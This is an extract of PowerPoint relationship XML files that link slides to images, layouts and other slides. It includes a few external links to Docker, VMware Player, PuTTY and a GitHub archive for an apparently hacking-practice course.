<file path=ppt/slides/_rels/slide335.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide336.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473.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72.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image471.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide337.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477.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide338.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide339.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image482.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image481.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79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.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340.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide341.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73.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image484.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide342.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image485.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide343.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide344.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87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image486.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide345.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image492.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image491.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90.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image489.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide346.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide347.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496.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95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image494.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide348.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99.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image498.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image497.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide349.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502.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image501.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35.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70.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide350.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image507.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image506.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505.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image504.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image503.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide351.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image513.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.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511.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image510.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image509.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide352.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image515.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide353.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide354.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519.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518.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image517.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image516.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide355.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image518.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide356.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide357.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image521.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide358.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide359.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.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360.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524.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image523.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide361.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490.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526.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image525.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide362.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image528.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image527.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide363.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29.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide364.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531.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide365.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535.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534.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image533.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image532.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide366.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image536.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide367.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide368.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image537.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide369.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541.bmp"/><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540.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image539.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image538.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.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hyperlink" Target="https://hub.docker.com/editions/community/docker-ce-desktop-windows" TargetMode="External"/><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370.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image543.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide371.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09.jpe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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide372.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image545.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide373.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image547.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide374.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide375.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335.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slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide376.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image553.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.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551.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image549.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide377.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image554.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide378.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vmware.com/kr/products/workstation-player/workstation-player-evaluation.html" TargetMode="Externa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slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide380.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382.xm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slide" Target="slide252.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide390.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide382.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image555.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><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383.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29.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381.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide384.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image556.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image558.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image557.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide385.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81.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image561.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image559.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide386.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476.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide387.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335.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slide" Target="slide381.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide388.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566.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image565.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image564.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image563.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide389.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570.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image569.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image568.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image567.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39.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90.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29.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381.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide391.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574.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image573.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image572.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image571.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide392.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81.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image576.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image575.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide393.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579.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image578.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image577.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image562.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide394.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81.xml"/><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335.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slide" Target="slide381.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide396.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583.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image582.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image581.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image580.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide397.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587.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide381.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image586.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image585.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image584.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide398.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29.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381.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide399.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8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40.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hyperlink" Target="https://github.com/arizona95/HackerSchoolFTZ/blob/master/FTZ.zip" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.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slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide400.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81.xml"/><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81.xml"/><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81.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide301.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04.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide301.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.jpeg"/><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405.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01.xml"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><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251.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide409.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide408.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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1.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slide" Target="slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" TargetMode="Externa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slide" Target="slide429.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide410.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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12.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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14.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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16.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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18.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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2.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420.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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22.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07.xml"/><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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.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24.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07.xml"/><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251.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide426.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide426.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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide425.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27.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25.xml"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1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81.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43.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430.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
